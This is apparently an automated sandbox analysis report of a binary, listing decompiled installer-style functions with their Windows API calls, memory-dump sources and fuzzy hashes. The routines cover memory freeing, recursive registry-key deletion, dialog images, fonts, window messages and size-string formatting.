Opcode Fuzzy Hash: 5755665d5a07ff276816291a20f7fda962d058b8d5726ef8cf218c2b9027c82a
Instruction Fuzzy Hash: BA21A072800128BBDF217FA5CE48DAE7E79EF05324F20423EF551762D1C67949418FA8

Uniqueness

Uniqueness Score: -1.00%

Function 72AB1837, Relevance: 7.7, APIs: 5, Instructions: 194
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E72AB1837(signed int __edx, void* __eflags, void* _a8, void* _a16) {
				void* _v8;
				signed int _v12;
				signed int _v20;
				signed int _v24;
				char _v52;
				void _t45;
				void _t46;
				signed int _t47;
				signed int _t48;
				signed int _t57;
				signed int _t58;
				signed int _t59;
				signed int _t60;
				signed int _t61;
				void* _t67;
				void* _t68;
				void* _t69;
				void* _t70;
				void* _t71;
				signed int _t77;
				void* _t81;
				signed int _t83;
				signed int _t85;
				signed int _t87;
				signed int _t90;
				void* _t101;

				_t85 = __edx;
				 *0x72ab405c = _a8;
				_t77 = 0;
				 *0x72ab4060 = _a16;
				_v12 = 0;
				_v8 = E72AB123B();
				_t90 = E72AB12FE(_t42);
				_t87 = _t85;
				_t81 = E72AB123B();
				_a8 = _t81;
				_t45 =  *_t81;
				if(_t45 != 0x7e && _t45 != 0x21) {
					_a16 = E72AB123B();
					_t77 = E72AB12FE(_t74);
					_v12 = _t85;
					GlobalFree(_a16);
					_t81 = _a8;
				}
				_t46 =  *_t81;
				_t101 = _t46 - 0x2f;
				if(_t101 > 0) {
					_t47 = _t46 - 0x3c;
					__eflags = _t47;
					if(_t47 == 0) {
						__eflags =  *((char*)(_t81 + 1)) - 0x3c;
						if( *((char*)(_t81 + 1)) != 0x3c) {
							__eflags = _t87 - _v12;
							if(__eflags > 0) {
								L56:
								_t48 = 0;
								__eflags = 0;
								L57:
								asm("cdq");
								L58:
								_t90 = _t48;
								_t87 = _t85;
								L59:
								E72AB1429(_t85, _t90, _t87,  &_v52);
								E72AB1266( &_v52);
								GlobalFree(_v8);
								return GlobalFree(_a8);
							}
							if(__eflags < 0) {
								L49:
								__eflags = 0;
								L50:
								_t48 = 1;
								goto L57;
							}
							__eflags = _t90 - _t77;
							if(_t90 < _t77) {
								goto L49;
							}
							goto L56;
						}
						_t85 = _t87;
						_t48 = E72AB2EF0(_t90, _t77, _t85);
						goto L58;
					}
					_t57 = _t47 - 1;
					__eflags = _t57;
					if(_t57 == 0) {
						__eflags = _t90 - _t77;
						if(_t90 != _t77) {
							goto L56;
						}
						__eflags = _t87 - _v12;
						if(_t87 != _v12) {
							goto L56;
						}
						goto L49;
					}
					_t58 = _t57 - 1;
					__eflags = _t58;
					if(_t58 == 0) {
						__eflags =  *((char*)(_t81 + 1)) - 0x3e;
						if( *((char*)(_t81 + 1)) != 0x3e) {
							__eflags = _t87 - _v12;
							if(__eflags < 0) {
								goto L56;
							}
							if(__eflags > 0) {
								goto L49;
							}
							__eflags = _t90 - _t77;
							if(_t90 <= _t77) {
								goto L56;
							}
							goto L49;
						}
						__eflags =  *((char*)(_t81 + 2)) - 0x3e;
						_t85 = _t87;
						_t59 = _t90;
						_t83 = _t77;
						if( *((char*)(_t81 + 2)) != 0x3e) {
							_t48 = E72AB2F10(_t59, _t83, _t85);
						} else {
							_t48 = E72AB2F40(_t59, _t83, _t85);
						}
						goto L58;
					}
					_t60 = _t58 - 0x20;
					__eflags = _t60;
					if(_t60 == 0) {
						_t90 = _t90 ^ _t77;
						_t87 = _t87 ^ _v12;
						goto L59;
					}
					_t61 = _t60 - 0x1e;
					__eflags = _t61;
					if(_t61 == 0) {
						__eflags =  *((char*)(_t81 + 1)) - 0x7c;
						if( *((char*)(_t81 + 1)) != 0x7c) {
							_t90 = _t90 | _t77;
							_t87 = _t87 | _v12;
							goto L59;
						}
						__eflags = _t90 | _t87;
						if((_t90 | _t87) != 0) {
							goto L49;
						}
						__eflags = _t77 | _v12;
						if((_t77 | _v12) != 0) {
							goto L49;
						}
						goto L56;
					}
					__eflags = _t61 == 0;
					if(_t61 == 0) {
						_t90 =  !_t90;
						_t87 =  !_t87;
					}
					goto L59;
				}
				if(_t101 == 0) {
					L21:
					__eflags = _t77 | _v12;
					if((_t77 | _v12) != 0) {
						_v24 = E72AB2D80(_t90, _t87, _t77, _v12);
						_v20 = _t85;
						_t48 = E72AB2E30(_t90, _t87, _t77, _v12);
						_t81 = _a8;
					} else {
						_v24 = _v24 & 0x00000000;
						_v20 = _v20 & 0x00000000;
						_t48 = _t90;
						_t85 = _t87;
					}
					__eflags =  *_t81 - 0x2f;
					if( *_t81 != 0x2f) {
						goto L58;
					} else {
						_t90 = _v24;
						_t87 = _v20;
						goto L59;
					}
				}
				_t67 = _t46 - 0x21;
				if(_t67 == 0) {
					_t48 = 0;
					__eflags = _t90 | _t87;
					if((_t90 | _t87) != 0) {
						goto L57;
					}
					goto L50;
				}
				_t68 = _t67 - 4;
				if(_t68 == 0) {
					goto L21;
				}
				_t69 = _t68 - 1;
				if(_t69 == 0) {
					__eflags =  *((char*)(_t81 + 1)) - 0x26;
					if( *((char*)(_t81 + 1)) != 0x26) {
						_t90 = _t90 & _t77;
						_t87 = _t87 & _v12;
						goto L59;
					}
					__eflags = _t90 | _t87;
					if((_t90 | _t87) == 0) {
						goto L56;
					}
					__eflags = _t77 | _v12;
					if((_t77 | _v12) == 0) {
						goto L56;
					}
					goto L49;
				}
				_t70 = _t69 - 4;
				if(_t70 == 0) {
					_t48 = E72AB2D40(_t90, _t87, _t77, _v12);
					goto L58;
				} else {
					_t71 = _t70 - 1;
					if(_t71 == 0) {
						_t90 = _t90 + _t77;
						asm("adc edi, [ebp-0x8]");
					} else {
						if(_t71 == 0) {
							_t90 = _t90 - _t77;
							asm("sbb edi, [ebp-0x8]");
						}
					}
					goto L59;
				}
			}

0x72ab1837
0x72ab1841
0x72ab184a
0x72ab184d
0x72ab1852
0x72ab185b
0x72ab1864
0x72ab1866
0x72ab186d
0x72ab186f
0x72ab1872
0x72ab1876
0x72ab1882
0x72ab188b
0x72ab1890
0x72ab1893
0x72ab1899
0x72ab1899
0x72ab189c
0x72ab189f
0x72ab18a2
0x72ab1968
0x72ab1968
0x72ab196b
0x72ab19e5
0x72ab19e9
0x72ab19f8
0x72ab19fb
0x72ab1a03
0x72ab1a03
0x72ab1a03
0x72ab1a05
0x72ab1a05
0x72ab1a06
0x72ab1a06
0x72ab1a08
0x72ab1a0a
0x72ab1a10
0x72ab1a19
0x72ab1a2a
0x72ab1a35
0x72ab1a35
0x72ab19fd
0x72ab19e0
0x72ab19e0
0x72ab19e2
0x72ab19e2
0x00000000
0x72ab19e2
0x72ab19ff
0x72ab1a01
0x00000000
0x00000000
0x00000000
0x72ab1a01
0x72ab19ed
0x72ab19f1
0x00000000
0x72ab19f1
0x72ab196d
0x72ab196d
0x72ab196e
0x72ab19d7
0x72ab19d9
0x00000000
0x00000000
0x72ab19db
0x72ab19de
0x00000000
0x00000000
0x00000000
0x72ab19de
0x72ab1970
0x72ab1970
0x72ab1971
0x72ab19aa
0x72ab19ae
0x72ab19ca
0x72ab19cd
0x00000000
0x00000000
0x72ab19cf
0x00000000
0x00000000
0x72ab19d1
0x72ab19d3
0x00000000
0x00000000
0x00000000
0x72ab19d5
0x72ab19b0
0x72ab19b4
0x72ab19b6
0x72ab19b8
0x72ab19ba
0x72ab19c3
0x72ab19bc
0x72ab19bc
0x72ab19bc
0x00000000
0x72ab19ba
0x72ab1973
0x72ab1973
0x72ab1976
0x72ab19a3
0x72ab19a5
0x00000000
0x72ab19a5
0x72ab1978
0x72ab1978
0x72ab197b
0x72ab198b
0x72ab198f
0x72ab199c
0x72ab199e
0x00000000
0x72ab199e
0x72ab1991
0x72ab1993
0x00000000
0x00000000
0x72ab1995
0x72ab1998
0x00000000
0x00000000
0x00000000
0x72ab199a
0x72ab197e
0x72ab197f
0x72ab1985
0x72ab1987
0x72ab1987
0x00000000
0x72ab197f
0x72ab18a8
0x72ab1920
0x72ab1922
0x72ab1925
0x72ab1943
0x72ab1946
0x72ab194c
0x72ab1951
0x72ab1927
0x72ab1927
0x72ab192b
0x72ab192f
0x72ab1931
0x72ab1931
0x72ab1954
0x72ab1957
0x00000000
0x72ab195d
0x72ab195d
0x72ab1960
0x00000000
0x72ab1960
0x72ab1957
0x72ab18aa
0x72ab18ad
0x72ab1911
0x72ab1913
0x72ab1915
0x00000000
0x00000000
0x00000000
0x72ab191b
0x72ab18af
0x72ab18b2
0x00000000
0x00000000
0x72ab18b4
0x72ab18b5
0x72ab18eb
0x72ab18ef
0x72ab1907
0x72ab1909
0x00000000
0x72ab1909
0x72ab18f1
0x72ab18f3
0x00000000
0x00000000
0x72ab18f9
0x72ab18fc
0x00000000
0x00000000
0x00000000
0x72ab1902
0x72ab18b7
0x72ab18ba
0x72ab18e1
0x00000000
0x72ab18bc
0x72ab18bc
0x72ab18bd
0x72ab18d1
0x72ab18d3
0x72ab18bf
0x72ab18c1
0x72ab18c7
0x72ab18c9
0x72ab18c9
0x72ab18c1
0x00000000
0x72ab18bd

APIs

GlobalFree.KERNEL32 ref: 72AB1893
GlobalFree.KERNEL32 ref: 72AB1A2A
GlobalFree.KERNEL32 ref: 72AB1A2F

Memory Dump Source

Source File: 00000000.00000002.688800351.0000000072AB1000.00000020.00020000.sdmp, Offset: 72AB0000, based on PE: true

Associated: 00000000.00000002.688792553.0000000072AB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.688807982.0000000072AB3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.688815540.0000000072AB5000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeGlobal
String ID:
API String ID: 2979337801-0
Opcode ID: 462cd7358b12584f09ffb976aa63f906938269c38cbee1ce7c95e1b1f09e3da3
Instruction ID: 2f1e287935417d8a184e13ee9f973b1ff6ab5c1fb1fcb1e7cde7e57428772477
Opcode Fuzzy Hash: 462cd7358b12584f09ffb976aa63f906938269c38cbee1ce7c95e1b1f09e3da3
Instruction Fuzzy Hash: 6751C672D441D4AEDB129FACC58866DBFBFAF4E345F14206ED406A311CC63DAA42C761

Uniqueness

Uniqueness Score: -1.00%

Function 00402CD0, Relevance: 7.6, APIs: 5, Instructions: 84
registryCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E00402CD0(void* __eflags, void* _a4, char* _a8, signed int _a12) {
				void* _v8;
				int _v12;
				char _v276;
				void* _t27;
				signed int _t33;
				intOrPtr* _t35;
				signed int _t45;
				signed int _t46;
				signed int _t47;

				_t46 = _a12;
				_t47 = _t46 & 0x00000300;
				_t45 = _t46 & 0x00000001;
				_t27 = E00405F5A(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
				if(_t27 == 0) {
					if((_a12 & 0x00000002) == 0) {
						L3:
						_push(0x105);
						_push( &_v276);
						_push(0);
						while(RegEnumKeyA(_v8, ??, ??, ??) == 0) {
							__eflags = _t45;
							if(__eflags != 0) {
								L10:
								RegCloseKey(_v8);
								return 0x3eb;
							}
							_t33 = E00402CD0(__eflags, _v8,  &_v276, _a12);
							__eflags = _t33;
							if(_t33 != 0) {
								break;
							}
							_push(0x105);
							_push( &_v276);
							_push(_t45);
						}
						RegCloseKey(_v8);
						_t35 = E004064DD(3);
						if(_t35 != 0) {
							return  *_t35(_a4, _a8, _t47, 0);
						}
						return RegDeleteKeyA(_a4, _a8);
					}
					_v12 = 0;
					if(RegEnumValueA(_v8, 0,  &_v276,  &_v12, 0, 0, 0, 0) != 0x103) {
						goto L10;
					}
					goto L3;
				}
				return _t27;
			}

0x00402cdb
0x00402ce4
0x00402ced
0x00402cf9
0x00402d02
0x00402d0c
0x00402d31
0x00402d37
0x00402d3c
0x00402d3d
0x00402d6d
0x00402d46
0x00402d48
0x00402d98
0x00402d9b
0x00000000
0x00402da1
0x00402d57
0x00402d5c
0x00402d5e
0x00000000
0x00000000
0x00402d66
0x00402d6b
0x00402d6c
0x00402d6c
0x00402d79
0x00402d81
0x00402d88
0x00000000
0x00402db1
0x00000000
0x00402d90
0x00402d1c
0x00402d2f
0x00000000
0x00000000
0x00000000
0x00402d2f
0x00402db7

APIs

RegEnumValueA.ADVAPI32 ref: 00402D24
RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402D70
RegCloseKey.ADVAPI32(?,?,?), ref: 00402D79
RegDeleteKeyA.ADVAPI32(?,?), ref: 00402D90
RegCloseKey.ADVAPI32(?,?,?), ref: 00402D9B

Memory Dump Source

Source File: 00000000.00000002.686270635.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.686246324.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.686303230.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.686323317.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686385427.000000000077B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686432272.0000000000780000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686463037.0000000000785000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686508318.0000000000787000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686555387.0000000000792000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686599667.00000000007A0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686616323.00000000007A9000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686646722.00000000007AC000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseEnum$DeleteValue
String ID:
API String ID: 1354259210-0
Opcode ID: c08e85f7896b9a4561d683b23b3b2dae21a167d845191f4bc040fadce0444681
Instruction ID: 148915660003aa48eae5eddbcc28bbe782376451a520f9e519856868b1d6a9df
Opcode Fuzzy Hash: c08e85f7896b9a4561d683b23b3b2dae21a167d845191f4bc040fadce0444681
Instruction Fuzzy Hash: 8D215771900109BBEF129F90CE89EEE7A7DEF44344F100076FA55B11A0E7B49E54AA68

Uniqueness

Uniqueness Score: -1.00%

Function 00401D65, Relevance: 7.6, APIs: 5, Instructions: 75
windowCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00401D65(void* __ebx, void* __edx) {
				struct HWND__* _t30;
				CHAR* _t38;
				void* _t48;
				void* _t53;
				signed int _t55;
				signed int _t58;
				long _t61;
				void* _t65;

				_t53 = __ebx;
				if(( *(_t65 - 0x1b) & 0x00000001) == 0) {
					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x20));
				} else {
					E00402BAC(2);
					 *((intOrPtr*)(__ebp - 0x38)) = __edx;
				}
				_t55 =  *(_t65 - 0x1c);
				 *(_t65 + 8) = _t30;
				_t58 = _t55 & 0x00000004;
				 *(_t65 - 0xc) = _t55 & 0x00000003;
				 *(_t65 - 0x34) = _t55 >> 0x1f;
				 *(_t65 - 0x30) = _t55 >> 0x0000001e & 0x00000001;
				if((_t55 & 0x00010000) == 0) {
					_t38 =  *(_t65 - 0x24) & 0x0000ffff;
				} else {
					_t38 = E00402BCE(0x11);
				}
				 *(_t65 - 8) = _t38;
				GetClientRect( *(_t65 + 8), _t65 - 0x84);
				asm("sbb edi, edi");
				_t61 = LoadImageA( ~_t58 &  *0x7a2f60,  *(_t65 - 8),  *(_t65 - 0xc),  *(_t65 - 0x7c) *  *(_t65 - 0x34),  *(_t65 - 0x78) *  *(_t65 - 0x30),  *(_t65 - 0x1c) & 0x0000fef0);
				_t48 = SendMessageA( *(_t65 + 8), 0x172,  *(_t65 - 0xc), _t61);
				if(_t48 != _t53 &&  *(_t65 - 0xc) == _t53) {
					DeleteObject(_t48);
				}
				if( *((intOrPtr*)(_t65 - 0x28)) >= _t53) {
					_push(_t61);
					E00406032();
				}
				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t65 - 4));
				return 0;
			}

0x00401d65
0x00401d69
0x00401d7e
0x00401d6b
0x00401d6d
0x00401d73
0x00401d73
0x00401d84
0x00401d87
0x00401d91
0x00401d94
0x00401d9c
0x00401dad
0x00401db0
0x00401dbb
0x00401db2
0x00401db4
0x00401db4
0x00401dbf
0x00401dcc
0x00401df3
0x00401e02
0x00401e10
0x00401e18
0x00401e20
0x00401e20
0x00401e29
0x00401e2f
0x004029a5
0x004029a5
0x00402a5d
0x00402a69

APIs

GetDlgItem.USER32 ref: 00401D7E
GetClientRect.USER32 ref: 00401DCC
LoadImageA.USER32 ref: 00401DFC
SendMessageA.USER32 ref: 00401E10
DeleteObject.GDI32(00000000), ref: 00401E20

Memory Dump Source

Source File: 00000000.00000002.686270635.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.686246324.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.686303230.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.686323317.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686385427.000000000077B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686432272.0000000000780000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686463037.0000000000785000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686508318.0000000000787000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686555387.0000000000792000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686599667.00000000007A0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686616323.00000000007A9000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686646722.00000000007AC000.00000002.00020000.sdmp Download File

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 40392f1eb7072ab94e38a578d4c48b342906e8e096f6e8c8612fbb26fff2dacf
Instruction ID: ebfb82876bdf2138dcddadba10df032a250d68975ffa4ffa2b6a0506bdc7ea5a
Opcode Fuzzy Hash: 40392f1eb7072ab94e38a578d4c48b342906e8e096f6e8c8612fbb26fff2dacf
Instruction Fuzzy Hash: 7F212872A00109AFCB05DFA4DD85AAEBBB5FB48300F24407EF905F62A1CB389941DB58

Uniqueness

Uniqueness Score: -1.00%

Function 00401E35, Relevance: 7.5, APIs: 5, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E00401E35(intOrPtr __edx) {
				void* __esi;
				int _t9;
				signed char _t15;
				struct HFONT__* _t18;
				intOrPtr _t30;
				struct HDC__* _t31;
				void* _t33;
				void* _t35;

				_t30 = __edx;
				_t31 = GetDC( *(_t35 - 8));
				_t9 = E00402BAC(2);
				 *((intOrPtr*)(_t35 - 0x38)) = _t30;
				0x40b808->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t31, 0x5a), 0x48));
				ReleaseDC( *(_t35 - 8), _t31);
				 *0x40b818 = E00402BAC(3);
				_t15 =  *((intOrPtr*)(_t35 - 0x18));
				 *((intOrPtr*)(_t35 - 0x38)) = _t30;
				 *0x40b81f = 1;
				 *0x40b81c = _t15 & 0x00000001;
				 *0x40b81d = _t15 & 0x00000002;
				 *0x40b81e = _t15 & 0x00000004;
				E00406167(_t9, _t31, _t33, 0x40b824,  *((intOrPtr*)(_t35 - 0x24)));
				_t18 = CreateFontIndirectA(0x40b808);
				_push(_t18);
				_push(_t33);
				E00406032();
				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}

0x00401e35
0x00401e40
0x00401e42
0x00401e4f
0x00401e66
0x00401e6b
0x00401e78
0x00401e7d
0x00401e81
0x00401e8c
0x00401e93
0x00401ea5
0x00401eab
0x00401eb0
0x00401eba
0x00402620
0x00401569
0x004029a5
0x00402a5d
0x00402a69

APIs

GetDC.USER32(?), ref: 00401E38
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E52
MulDiv.KERNEL32(00000000,00000000), ref: 00401E5A
ReleaseDC.USER32 ref: 00401E6B
CreateFontIndirectA.GDI32(0040B808), ref: 00401EBA

Memory Dump Source

Source File: 00000000.00000002.686270635.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.686246324.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.686303230.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.686323317.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686385427.000000000077B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686432272.0000000000780000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686463037.0000000000785000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686508318.0000000000787000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686555387.0000000000792000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686599667.00000000007A0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686616323.00000000007A9000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686646722.00000000007AC000.00000002.00020000.sdmp Download File

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID:
API String ID: 3808545654-0
Opcode ID: dbc41a527304c6fe7c4bbb0ed52bde6d70f826071420a725491f8bf133d98c2a
Instruction ID: 57ae00d383071d6c5df03c611de82deed4414851ba4a5b5ac7ac255a7617b9b1
Opcode Fuzzy Hash: dbc41a527304c6fe7c4bbb0ed52bde6d70f826071420a725491f8bf133d98c2a
Instruction Fuzzy Hash: 0E019672500240AFD7006BB0AE4A79A3FF8D755301F108839F241B62F2C67804458BAC

Uniqueness

Uniqueness Score: -1.00%

Function 00401C2E, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84
windowtimeCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00401C2E(intOrPtr __edx) {
				int _t29;
				long _t30;
				signed int _t32;
				CHAR* _t35;
				long _t36;
				int _t41;
				signed int _t42;
				int _t46;
				int _t56;
				intOrPtr _t57;
				struct HWND__* _t61;
				void* _t64;

				_t57 = __edx;
				_t29 = E00402BAC(3);
				 *((intOrPtr*)(_t64 - 0x38)) = _t57;
				 *(_t64 - 8) = _t29;
				_t30 = E00402BAC(4);
				 *((intOrPtr*)(_t64 - 0x38)) = _t57;
				 *(_t64 + 8) = _t30;
				if(( *(_t64 - 0x14) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 8)) = E00402BCE(0x33);
				}
				__eflags =  *(_t64 - 0x14) & 0x00000002;
				if(( *(_t64 - 0x14) & 0x00000002) != 0) {
					 *(_t64 + 8) = E00402BCE(0x44);
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x2c)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t59 = E00402BCE();
					_t32 = E00402BCE();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t35 =  ~( *_t31) & _t59;
					__eflags = _t35;
					_t36 = FindWindowExA( *(_t64 - 8),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
					goto L10;
				} else {
					_t61 = E00402BAC();
					 *((intOrPtr*)(_t64 - 0x38)) = _t57;
					_t41 = E00402BAC(2);
					 *((intOrPtr*)(_t64 - 0x38)) = _t57;
					_t56 =  *(_t64 - 0x14) >> 2;
					if(__eflags == 0) {
						_t36 = SendMessageA(_t61, _t41,  *(_t64 - 8),  *(_t64 + 8));
						L10:
						 *(_t64 - 0xc) = _t36;
					} else {
						_t42 = SendMessageTimeoutA(_t61, _t41,  *(_t64 - 8),  *(_t64 + 8), _t46, _t56, _t64 - 0xc);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x28)) - _t46;
				if( *((intOrPtr*)(_t64 - 0x28)) >= _t46) {
					_push( *(_t64 - 0xc));
					E00406032();
				}
				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t64 - 4));
				return 0;
			}

0x00401c2e
0x00401c30
0x00401c37
0x00401c3a
0x00401c3d
0x00401c47
0x00401c4b
0x00401c4e
0x00401c57
0x00401c57
0x00401c5a
0x00401c5e
0x00401c67
0x00401c67
0x00401c6a
0x00401c6e
0x00401c70
0x00401cc5
0x00401cc7
0x00401cd0
0x00401cd8
0x00401cdb
0x00401cdb
0x00401ce4
0x00000000
0x00401c72
0x00401c79
0x00401c7b
0x00401c7e
0x00401c84
0x00401c8b
0x00401c8e
0x00401cb6
0x00401cea
0x00401cea
0x00401c90
0x00401c9e
0x00401ca6
0x00401ca9
0x00401ca9
0x00401c8e
0x00401ced
0x00401cf0
0x00401cf6
0x004029a5
0x004029a5
0x00402a5d
0x00402a69

APIs

SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C9E
SendMessageA.USER32 ref: 00401CB6

Strings

!, xrefs: 00401C6A

Memory Dump Source

Source File: 00000000.00000002.686270635.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.686246324.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.686303230.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.686323317.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686385427.000000000077B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686432272.0000000000780000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686463037.0000000000785000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686508318.0000000000787000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686555387.0000000000792000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686599667.00000000007A0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686616323.00000000007A9000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686646722.00000000007AC000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: f0dd942a178f56fd373b290941ab0376cb77fac67056b85627442068a5db435e
Instruction ID: 5277f65d77addf964e4e112e3ca2bdcdb488fad455084b9b29b5161e7124752c
Opcode Fuzzy Hash: f0dd942a178f56fd373b290941ab0376cb77fac67056b85627442068a5db435e
Instruction Fuzzy Hash: 4C216071944208BEEB059FB5D98AAAE7FB5EF44304F20847FF502B61D1D6B88540DB28

Uniqueness

Uniqueness Score: -1.00%

Function 004049A1, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84
stringCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E004049A1(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v36;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t21;
				signed int _t22;
				void* _t29;
				void* _t31;
				void* _t32;
				void* _t41;
				signed int _t43;
				signed int _t47;
				signed int _t50;
				signed int _t51;
				signed int _t53;

				_t21 = _a16;
				_t51 = _a12;
				_t41 = 0xffffffdc;
				if(_t21 == 0) {
					_push(0x14);
					_pop(0);
					_t22 = _t51;
					if(_t51 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t41 = 0xffffffdd;
					}
					if(_t51 < 0x400) {
						_t41 = 0xffffffde;
					}
					if(_t51 < 0xffff3333) {
						_t50 = 0x14;
						asm("cdq");
						_t22 = 1 / _t50 + _t51;
					}
					_t23 = _t22 & 0x00ffffff;
					_t53 = _t22 >> 0;
					_t43 = 0xa;
					_t47 = ((_t22 & 0x00ffffff) + _t23 * 4 + (_t22 & 0x00ffffff) + _t23 * 4 >> 0) % _t43;
				} else {
					_t53 = (_t21 << 0x00000020 | _t51) >> 0x14;
					_t47 = 0;
				}
				_t29 = E00406167(_t41, _t47, _t53,  &_v36, 0xffffffdf);
				_t31 = E00406167(_t41, _t47, _t53,  &_v68, _t41);
				_t32 = E00406167(_t41, _t47, 0x79f568, 0x79f568, _a8);
				wsprintfA(_t32 + lstrlenA(0x79f568), "%u.%u%s%s", _t53, _t47, _t31, _t29);
				return SetDlgItemTextA( *0x7a2738, _a4, 0x79f568);
			}

0x004049a7
0x004049ac
0x004049b4
0x004049b5
0x004049c2
0x004049ca
0x004049cb
0x004049cd
0x004049cf
0x004049d1
0x004049d4
0x004049d4
0x004049db
0x004049e1
0x004049e1
0x004049e8
0x004049ef
0x004049f2
0x004049f5
0x004049f5
0x004049f9
0x00404a09
0x00404a0b
0x00404a0e
0x004049b7
0x004049b7
0x004049be
0x004049be
0x00404a16
0x00404a21
0x00404a37
0x00404a47
0x00404a63

APIs

lstrlenA.KERNEL32(0079F568,0079F568,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004048BC,000000DF,00000000,00000400,?), ref: 00404A3F
wsprintfA.USER32 ref: 00404A47
SetDlgItemTextA.USER32 ref: 00404A5A

Strings

%u.%u%s%s, xrefs: 00404A29

Memory Dump Source

Source File: 00000000.00000002.686270635.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.686246324.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.686303230.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.686323317.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686385427.000000000077B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686432272.0000000000780000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686463037.0000000000785000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686508318.0000000000787000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686555387.0000000000792000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686599667.00000000007A0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686616323.00000000007A9000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686646722.00000000007AC000.00000002.00020000.sdmp Download File

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
